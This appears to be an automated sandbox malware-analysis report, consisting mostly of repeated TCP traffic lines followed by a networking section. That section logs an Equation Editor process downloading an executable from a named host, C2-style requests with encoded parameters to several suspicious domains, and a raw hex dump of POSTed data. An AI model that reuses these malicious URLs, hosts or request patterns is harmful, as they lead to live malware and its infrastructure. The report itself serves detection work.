Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443

Networking

barindex
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeDNS query: www.myprefpal.xyz
Source: Joe Sandbox ViewIP Address: 15.197.148.33 15.197.148.33
Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036AE55A LoadLibraryW,URLDownloadToFileW,2_2_036AE55A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\kontempt2.1[1].htmJump to behavior
Source: global trafficHTTP traffic detected: GET /kontempt2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: timurtrading.my
Source: global trafficHTTP traffic detected: GET /kontempt2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: timurtrading.myConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /8pmv/?eDZh=0pI0vDB&IDX46=o+HDgodiamRQHtDMpIt6QXV1yFQyIuHAMV1gOVYcjWmvuGh+h7IrtYfSQO/kpwxsxn8zwcxo4M/m/nbjbIRZpxhbjjpUXySeQkriE3Dek1xl8vaSGOlLDW237/Ca HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.omnibizlux.bizUser-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
Source: global trafficHTTP traffic detected: GET /2022/sqlite-dll-win32-x86-3380000.zip HTTP/1.1User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /quvp/?IDX46=ZW1g+h73VjV8NmrD3A0IsvQAl9tCTvv5s7OxxnbN69qnRFmJveufixywo3eCJN9Bi9pNL2fgeIfBDTgJwEUErU/4IwV0Yt2V4k+CbVZpThcE8pzI6qgsTHE3GSfU&eDZh=0pI0vDB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.75e296qdx.topUser-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
Source: global trafficHTTP traffic detected: GET /2xrt/?IDX46=t8QlsLf/hSao5OfTjGXyvO3SE3egRcZN/0WYGutq4Zw3gZ9pwtfqpd7Txie7AUKWMV3AhFtCGrZ0PcR2NtL0Erm7E7qQmCH1czZzhi0sD+dlnO4gaz+HrJe+v97h&eDZh=0pI0vDB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.myprefpal.xyzUser-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
Source: EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global trafficDNS traffic detected: DNS query: timurtrading.my
Source: global trafficDNS traffic detected: DNS query: www.omnibizlux.biz
Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
Source: global trafficDNS traffic detected: DNS query: www.75e296qdx.top
Source: global trafficDNS traffic detected: DNS query: www.myprefpal.xyz
Source: global trafficDNS traffic detected: DNS query: www.jilifish.win
Source: unknownHTTP traffic detected: POST /quvp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 2162Host: www.75e296qdx.topOrigin: http://www.75e296qdx.topReferer: http://www.75e296qdx.top/quvp/User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10Data Raw: 49 44 58 34 36 3d 55 55 64 41 39 57 75 66 65 6e 46 41 52 57 58 6d 37 41 38 4a 69 66 77 39 31 4f 30 30 64 66 7a 77 6f 38 6d 6c 71 68 50 6e 73 4d 53 43 64 48 2b 50 38 64 43 54 37 54 43 37 6f 55 57 30 47 39 63 66 2f 4f 6c 59 4d 6d 58 37 61 4e 44 76 4e 53 34 4a 68 7a 49 6e 6d 46 72 69 46 68 4d 6c 55 35 61 6d 37 33 2f 52 62 56 5a 50 66 41 51 30 32 61 66 50 35 4c 30 52 62 68 6f 65 64 56 69 37 68 59 66 2f 42 78 64 55 34 48 2b 61 6f 75 33 75 56 34 6f 66 58 71 55 70 55 30 68 51 62 64 68 4a 79 73 31 43 5a 75 36 54 78 30 47 66 30 54 77 31 4f 4f 42 42 6a 6c 5a 38 64 36 54 31 6c 61 6f 78 4e 2b 62 62 65 50 4c 34 4f 4b 6f 39 59 75 63 30 32 5a 58 4a 67 6a 35 75 79 45 4a 64 7a 41 37 6b 31 33 47 73 73 75 77 78 38 48 47 6c 6d 4a 78 4e 79 55 43 51 77 59 41 78 4e 6c 6f 42 33 78 59 6a 2b 31 4c 4a 6d 37 66 78 76 6d 63 2b 49 32 57 44 4c 62 71 4d 71 78 41 4f 42 77 41 2f 48 6a 4c 35 63 6a 78 31 64 39 7a 56 51 71 50 41 63 34 76 41 7a 63 51 57 65 2b 68 78 75 61 63 70 53 62 30 79 4e 43 72 34 75 55 36 71 72 38 53 65 61 6d 79 45 4f 6b 73 74 30 4d 76 42 2b 61 63 77 44 41 59 34 44 6d 51 38 46 51 35 43 6d 2b 4b 45 33 6e 41 4d 52 4f 30 79 6a 33 4c 53 61 2b 72 45 46 34 64 77 54 46 46 44 70 47 76 2b 36 66 68 47 43 57 63 4a 7a 59 42 72 55 5a 4e 33 56 41 43 41 35 52 44 44 73 6b 79 5a 48 6b 39 74 42 51 43 4d 71 77 7a 32 6d 2b 63 76 63 4c 46 71 34 6b 34 45 36 6a 72 71 42 44 77 76 79 31 63 6d 33 6a 5a 67 36 50 64 6e 78 6c 57 35 44 6c 4b 39 34 79 71 4c 61 5a 4f 47 34 64 48 69 64 71 33 4c 65 71 50 43 67 56 30 49 72 58 67 44 4e 77 35 73 